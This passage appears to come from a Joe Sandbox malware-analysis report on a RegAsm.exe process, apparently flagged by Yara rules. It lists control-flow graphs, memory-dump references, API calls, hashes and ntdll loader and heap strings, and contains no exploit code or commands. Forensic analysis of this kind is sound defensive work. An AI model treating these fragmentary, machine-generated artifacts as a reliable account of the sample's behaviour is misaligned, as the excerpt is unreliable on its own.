                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 57 2e435c0-2e435cc LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 55 2e42c70-2e42c7c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 56 2e42df0-2e42dfc LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 42c963-42c9a4 call 404793 call 42d833 RtlFreeHeap
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C99F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: ddA
                                                        • API String ID: 3298025750-2966775115

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 36 42c913-42c954 call 404793 call 42d833 RtlAllocateHeap
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(?,0041E4CB,?,?,00000000,?,0041E4CB,?,?,?), ref: 0042C94F
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 46 42c9b3-42c9ec call 404793 call 42d833 ExitProcess
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 51 2e42c0a-2e42c0f 52 2e42c11-2e42c18 51->52 53 2e42c1f-2e42c26 LdrInitializeThunk 51->53
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-2160512332
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                        Strings
                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 02E75543
                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02E7540A, 02E75496, 02E75519
                                                        • corrupted critical section, xrefs: 02E754C2
                                                        • Invalid debug info address of this critical section, xrefs: 02E754B6
                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02E754E2
                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02E754CE
                                                        • Critical section debug info address, xrefs: 02E7541F, 02E7552E
                                                        • Critical section address., xrefs: 02E75502
                                                        • double initialized or corrupted critical section, xrefs: 02E75508
                                                        • Address of the debug info found in the active list., xrefs: 02E754AE, 02E754FA
                                                        • undeleted critical section in freed memory, xrefs: 02E7542B
                                                        • Thread identifier, xrefs: 02E7553A
                                                        • Critical section address, xrefs: 02E75425, 02E754BC, 02E75534
                                                        • 8, xrefs: 02E752E3
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                        Strings
                                                        • @, xrefs: 02DFD313
                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 02DFD2C3
                                                        • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 02DFD146
                                                        • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 02DFD0CF
                                                        • Control Panel\Desktop\LanguageConfiguration, xrefs: 02DFD196
                                                        • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 02DFD262
                                                        • @, xrefs: 02DFD2AF
                                                        • @, xrefs: 02DFD0FD
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                        Strings
                                                        • Status != STATUS_NOT_FOUND, xrefs: 02E6789A
                                                        • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 02E67709
                                                        • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 02E676EE
                                                        • Internal error check failed, xrefs: 02E67718, 02E678A9
                                                        • sxsisol_SearchActCtxForDllName, xrefs: 02E676DD
                                                        • minkernel\ntdll\sxsisol.cpp, xrefs: 02E67713, 02E678A4
                                                        • @, xrefs: 02E19EE7
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                        Strings
                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 02E781E5
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 02E3C6C3
                                                        • LdrpInitializeProcess, xrefs: 02E3C6C4
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 02E78181, 02E781F5
                                                        • LdrpInitializeImportRedirection, xrefs: 02E78177, 02E781EB
                                                        • Loading import redirection DLL: '%wZ', xrefs: 02E78170
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                        Strings
                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 02E72180
                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 02E721BF
                                                        • SXS: %s() passed the empty activation context, xrefs: 02E72165
                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 02E7219F
                                                        • RtlGetAssemblyStorageRoot, xrefs: 02E72160, 02E7219A, 02E721BA
                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 02E72178
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                        • API String ID: 0-3127649145
                                                        • Opcode ID: e5ef8363bfedef839ffad932ed16ed0f2c2ce4f38c1be5db4dd52c947cf2c3ec
                                                        • Instruction ID: 7e099beda6941e92e55bf5c04947fbe9ecb68ae15b9055c78f862f2cfe3b8634
                                                        • Opcode Fuzzy Hash: e5ef8363bfedef839ffad932ed16ed0f2c2ce4f38c1be5db4dd52c947cf2c3ec
                                                        • Instruction Fuzzy Hash: D2324970A417199BDB21DF65CC88B9AB7F9FF48304F1091EAE54DA7250EB70AA84CF50
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                        • API String ID: 0-3393094623
                                                        • Opcode ID: 9bc54f74f9794b4299b3bf59d868462cb6194bca34f789ed05b6e800bbf758e0
                                                        • Instruction ID: 345d951febe50d97e545fbacc41b66a3546f1897bd03e2fc57d1d774420b2b62
                                                        • Opcode Fuzzy Hash: 9bc54f74f9794b4299b3bf59d868462cb6194bca34f789ed05b6e800bbf758e0
                                                        • Instruction Fuzzy Hash: 72025B71588341CFD720CF24C1A4BABB7E5BF88748F44E96EE9998B251E770D844CB92
                                                        Strings
                                                        • Kernel-MUI-Language-SKU, xrefs: 02E2542B
                                                        • Kernel-MUI-Number-Allowed, xrefs: 02E25247
                                                        • WindowsExcludedProcs, xrefs: 02E2522A
                                                        • Kernel-MUI-Language-Allowed, xrefs: 02E2527B
                                                        • Kernel-MUI-Language-Disallowed, xrefs: 02E25352
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                        • API String ID: 0-258546922
                                                        • Opcode ID: 2ffa133ab32c5142a12c92df58fc392b9a7b91a078fd991cb7734dd3f3fc94a6
                                                        • Instruction ID: ade75735366bc239f4715b0e33881ded974240e7515fad327df7b2657299295b
                                                        • Opcode Fuzzy Hash: 2ffa133ab32c5142a12c92df58fc392b9a7b91a078fd991cb7734dd3f3fc94a6
                                                        • Instruction Fuzzy Hash: 68F14D72D90629EBCB15DF94C980AEEB7B9EF08754F50906AE502F7210DB709E05CFA0
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                        • API String ID: 0-2518169356
                                                        • Opcode ID: d5634c4cfb5ce5bb01f5f97dec7f1caa8cf94e02f047836e04aaa60b7db7edc3
                                                        • Instruction ID: 4b4e20fb9d487de52bef825ea3d35d864297e81d219bee505e0665d7d7a9508e
                                                        • Opcode Fuzzy Hash: d5634c4cfb5ce5bb01f5f97dec7f1caa8cf94e02f047836e04aaa60b7db7edc3
                                                        • Instruction Fuzzy Hash: 0891F472D40A19CBCB21DF59C880ABEB7B1EF48318F999169E84CE7350DB35D901CB90
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-1975516107
                                                        • Opcode ID: 88da96b8d5b3fb6698493c2bbcfad013eb9d9106ac38a80faffe54da571e40d8
                                                        • Instruction ID: 9382a92673c07dc6bc168e53fc293afdb074c93242711675b9f0a210eb664db5
                                                        • Opcode Fuzzy Hash: 88da96b8d5b3fb6698493c2bbcfad013eb9d9106ac38a80faffe54da571e40d8
                                                        • Instruction Fuzzy Hash: 3D511371EC03558FDB18DF64D88479DBBB2BF44708F54A559EA026B281C7709889CF80
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                        • API String ID: 0-3061284088
                                                        • Opcode ID: 818856f5709b52ba00dd246e8f3e394347b3f9468088a4fd49fd0119d290257e
                                                        • Instruction ID: c1ae23e194a11392c30108ebad26e111c049813db7a571f9391cec9cbbe035e2
                                                        • Opcode Fuzzy Hash: 818856f5709b52ba00dd246e8f3e394347b3f9468088a4fd49fd0119d290257e
                                                        • Instruction Fuzzy Hash: B201FC32194690EEF2659719F40AF92F7E4EF46B3CF25805EF9018B7A1CBA49C88C574
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-3178619729
                                                        • Opcode ID: 5142960d1016e4da982574e9592d04354a565c7d21e39e9c7b486b7fffc879e7
                                                        • Instruction ID: ed01542ab45af6d395612648a236c55fc48ddbea8279b065deb76d319c42eeea
                                                        • Opcode Fuzzy Hash: 5142960d1016e4da982574e9592d04354a565c7d21e39e9c7b486b7fffc879e7
                                                        • Instruction Fuzzy Hash: 65138D70A406558FEB29CF68C4907A9FBF2FF49708F14D1A9E849AB381D734A945CF90
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-3570731704
                                                        • Opcode ID: b93936fb6c3160fc217faa6c7549d45d5703bfe71555a6a27fc2b8f1a87a6109
                                                        • Instruction ID: b5eeb97d07dd1a680f92b441874661e83d82e3dca9c93056c271d5de5ca4691d
                                                        • Opcode Fuzzy Hash: b93936fb6c3160fc217faa6c7549d45d5703bfe71555a6a27fc2b8f1a87a6109
                                                        • Instruction Fuzzy Hash: 1D923A71A80269CFEB24CF14C844BA9B7B6BF45354F15D1E9EA4DAB281D7309E80CF51
                                                        Strings
                                                        • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 02E67D56
                                                        • SsHd, xrefs: 02E1A885
                                                        • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 02E67D03
                                                        • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 02E67D39
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                        • API String ID: 0-2905229100
                                                        • Opcode ID: c6da2bf19c3a3416a035d5aade4717110c9fdccf996d6958736ef75392d9b3ea
                                                        • Instruction ID: a03a0bac58293ace062f5eaa4a53f000f2d857955361ed200ea0981277c827e6
                                                        • Opcode Fuzzy Hash: c6da2bf19c3a3416a035d5aade4717110c9fdccf996d6958736ef75392d9b3ea
                                                        • Instruction Fuzzy Hash: 19D18F71A812159BDF24CF98D8C0AFDB7B6FF48318F19A07AE845AB345D3319991CB90
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-3178619729
                                                        • Opcode ID: 5ff194374a3431406e88ef52a86d53d4638732c3eb0ebc3a2fbf4373abba735f
                                                        • Instruction ID: 2247405ea40d0d7cc5987262d028781dd6ad43fcf1c0bff160fcce590d7bfa85
                                                        • Opcode Fuzzy Hash: 5ff194374a3431406e88ef52a86d53d4638732c3eb0ebc3a2fbf4373abba735f
                                                        • Instruction Fuzzy Hash: 57E2A070A402559FDB25CF69C490BAEBBF1FF49308F14D1A9E849AB385D734A885CF90
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                        • API String ID: 0-379654539
                                                        • Opcode ID: cf5dedf5754ca0e02111d076411aa69d6ed8883d6850815d50087f0a56dac1c9
                                                        • Instruction ID: e075dc661f368defa44df5e424d35f3caf17e961a482a62978aa56c7eacf0a5b
                                                        • Opcode Fuzzy Hash: cf5dedf5754ca0e02111d076411aa69d6ed8883d6850815d50087f0a56dac1c9
                                                        • Instruction Fuzzy Hash: 47C18F7418838ACFC710DF54C484BAAB7E5BF84748F00E969FA958B390E734C986CB52
                                                        Strings
                                                        • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 02E655AE
                                                        • HEAP[%wZ]: , xrefs: 02E654D1, 02E65592
                                                        • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 02E654ED
                                                        • HEAP: , xrefs: 02E654E0, 02E655A1
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                        • API String ID: 0-1657114761
                                                        • Opcode ID: 43dd572cceab2b2d7fc36c783bbeaab895f94f9e2d0d0523dff6a76dfd81e9e9
                                                        • Instruction ID: 5d42385160cd7e22c7f1a958dc517fa9fb16adbdfeafb921b418c9e89bbc03f3
                                                        • Opcode Fuzzy Hash: 43dd572cceab2b2d7fc36c783bbeaab895f94f9e2d0d0523dff6a76dfd81e9e9
                                                        • Instruction Fuzzy Hash: 15A1CF306806059FD724CF24C484BBABBF2EF45308F54E579E89A8B781D731E989CB91
                                                        Strings
                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 02E722B6
                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 02E721D9, 02E722B1
                                                        • SXS: %s() passed the empty activation context, xrefs: 02E721DE
                                                        • .Local, xrefs: 02E328D8
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                        • API String ID: 0-1239276146
                                                        • Opcode ID: c3daba1c5b6612aed26912698318deff0a67dacee6cc85e9cc977c5992ea8dee
                                                        • Instruction ID: 30c2ec72fd2bb05f1c581bfddcb615aba87f259c1870d13134e3da073ddf69de
                                                        • Opcode Fuzzy Hash: c3daba1c5b6612aed26912698318deff0a67dacee6cc85e9cc977c5992ea8dee
                                                        • Instruction Fuzzy Hash: 5BA18031981229DBDB25CF64D888BA9B3B1BF58318F1591E9DE49AB250D7309E81CF90
                                                        Strings
                                                        Similarity
